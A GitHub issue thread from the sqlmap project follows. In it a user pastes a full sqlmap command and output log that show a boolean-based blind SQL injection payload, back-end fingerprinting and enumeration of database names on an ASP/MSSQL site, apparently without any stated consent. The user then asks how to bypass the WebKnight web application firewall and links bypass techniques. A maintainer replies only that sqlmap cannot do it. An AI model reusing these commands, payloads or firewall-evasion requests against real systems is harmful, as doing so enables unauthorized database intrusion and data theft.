How can I bypass this? Is there a way? #949

Closed
angelz12 opened this issue Nov 17, 2014 · 3 comments
@angelz12

C:\Users\Angelz\Desktop\sqlmap neue version>sqlmap.py -u "http://www.test.asp" --"data=SearchField=1*&SearchStr=" --dbms=mssql --thread
s=10 --level=5 --risk=3 --no-cast --timeout=1000 --retries=10 --batch --tamper=charunicodeencode.py --tables
_
___ _| |___ ___ ___ {1.0-dev-nongit-20141117}
|_ -| . | | | .'| . |
|| |||||,| |
|
| |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state
and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 18:33:58

[18:33:58] [INFO] loading tamper script 'charunicodeencode'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] Y
[18:33:58] [INFO] testing connection to the target URL

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: (custom) POST
Parameter: #1*
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)

Payload: SearchField=(SELECT (CASE WHEN (7096=7096) THEN 1 ELSE 7096*(SELECT 7096 FROM master..sysdatabases) END))&SearchStr=

[18:34:04] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[18:34:04] [INFO] testing Microsoft SQL Server
[18:34:04] [INFO] confirming Microsoft SQL Server
[18:34:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[18:34:04] [INFO] fetching database names
[18:34:04] [INFO] fetching number of databases
[18:34:04] [INFO] resumed: 9
[18:34:04] [INFO] retrieving the length of query output
[18:34:04] [INFO] resumed: 9
[18:34:04] [INFO] resumed: *******
[18:34:04] [INFO] retrieving the length of query output
[18:34:04] [INFO] resumed: 10
[18:34:04] [INFO] resumed: *******
[18:34:04] [INFO] retrieving the length of query output
[18:34:04] [INFO] resumed: 12
[18:34:04] [INFO] resumed: *******
[18:34:04] [INFO] retrieving the length of query output
[18:34:04] [INFO] resumed: 13
[18:34:04] [INFO] resumed: *********
[18:34:04] [INFO] retrieving the length of query output
[18:34:04] [INFO] resumed: 6
[18:34:04] [INFO] resumed: master
[18:34:04] [INFO] retrieving the length of query output
[18:34:04] [INFO] resumed: 6
[18:34:04] [INFO] resumed: mg1106
[18:34:04] [INFO] retrieving the length of query output
[18:34:04] [INFO] resumed: 5
[18:34:04] [INFO] resumed: model
[18:34:04] [INFO] retrieving the length of query output
[18:34:04] [INFO] resumed: 4
[18:34:04] [INFO] resumed: msdb
[18:34:04] [INFO] retrieving the length of query output
[18:34:04] [INFO] resumed: 6
[18:34:04] [INFO] resumed: tempdb
[18:34:04] [INFO] fetching tables for databases: _, I__, ´***, __, master, mg1106, model, msdb, tempdb
[18:34:04] [INFO] fetching number of tables for database '
_*****'
[18:34:04] [INFO] retrieved:
[18:34:05] [INFO] heuristics detected web page charset 'ascii'

[18:34:07] [INFO] retrieved:
[18:34:12] [INFO] retrieved:
[18:34:15] [WARNING] unable to retrieve the number of tables for database '_'
[18:34:15] [INFO] fetching number of tables for database 'tempdb'
[18:34:15] [INFO] retrieved:
[18:34:19] [INFO] retrieved:
[18:34:22] [INFO] retrieved:
[18:34:26] [WARNING] unable to retrieve the number of tables for database 'tempdb'
[18:34:26] [INFO] fetching number of tables for database '_
'
[18:34:26] [INFO] retrieved:
[18:34:29] [INFO] retrieved:
[18:34:33] [INFO] retrieved:
[18:34:36] [WARNING] unable to retrieve the number of tables for database 'INix_Intra'
[18:34:36] [INFO] fetching number of tables for database '**
_'
[18:34:36] [INFO] retrieved:
[18:34:40] [INFO] retrieved:
[18:34:43] [INFO] retrieved:
[18:34:47] [WARNING] unable to retrieve the number of tables for database '_
_'
[18:34:47] [INFO] fetching number of tables for database 'msdb'
[18:34:47] [INFO] retrieved:
[18:34:50] [INFO] retrieved:
[18:34:54] [INFO] retrieved:
[18:34:57] [WARNING] unable to retrieve the number of tables for database 'msdb'
[18:34:57] [INFO] fetching number of tables for database 'mg1106'
[18:34:57] [INFO] retrieved:
[18:35:01] [INFO] retrieved:
[18:35:04] [INFO] retrieved:
[18:35:08] [WARNING] unable to retrieve the number of tables for database 'mg1106'
[18:35:08] [INFO] fetching number of tables for database 'master'
[18:35:08] [INFO] retrieved:
[18:35:11] [INFO] retrieved:
[18:35:15] [INFO] retrieved:
[18:35:18] [WARNING] unable to retrieve the number of tables for database 'master'
[18:35:18] [INFO] fetching number of tables for database '
_
*********'
[18:35:18] [INFO] retrieved:
[18:35:22] [INFO] retrieved:
[18:35:27] [INFO] retrieved:
[18:35:31] [WARNING] unable to retrieve the number of tables for database '**
***********'
[18:35:31] [INFO] fetching number of tables for database 'model'
[18:35:31] [INFO] retrieved:
[18:35:34] [INFO] retrieved:
[18:35:38] [INFO] retrieved:
[18:35:41] [WARNING] unable to retrieve the number of tables for database 'model'
[18:35:41] [CRITICAL] unable to retrieve the tables for any database

I got this message on an extended scan before...
[04:44:42] INFO POST parameter '#1_' seems to be 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)' injectable (with --string
="1. Take your best picture and post here.")
(custom) POST parameter '#1_' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[10:48:56] [INFO] target URL appears to have 169 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y

I tried between and charunicodeencode; both can't get it. I can see the DBs, I know the table names and columns, I retrieved slots but I can't see it. My bypass script can't handle it, I think... Hope you can help me in this case. Thank you for your time, sir. Yours sincerely...

...How can I bypass the WebKnight AQTRONIX?
web application technology: ASP.NET, Microsoft IIS 6.0, ASP

@stamparm
Member

Currently there is no way (from sqlmap)

@angelz12
Author

When is it available?

@angelz12
Author

http://ipv4.os3.nl/_media/2013-2014/courses/ot/andreas_george.pdf Here for an update to bypass that shit; maybe you can add this to tamper sources, thx. PS: in the PDF you see the category "SQL inject the WAF", a guy shows some tricks ^^
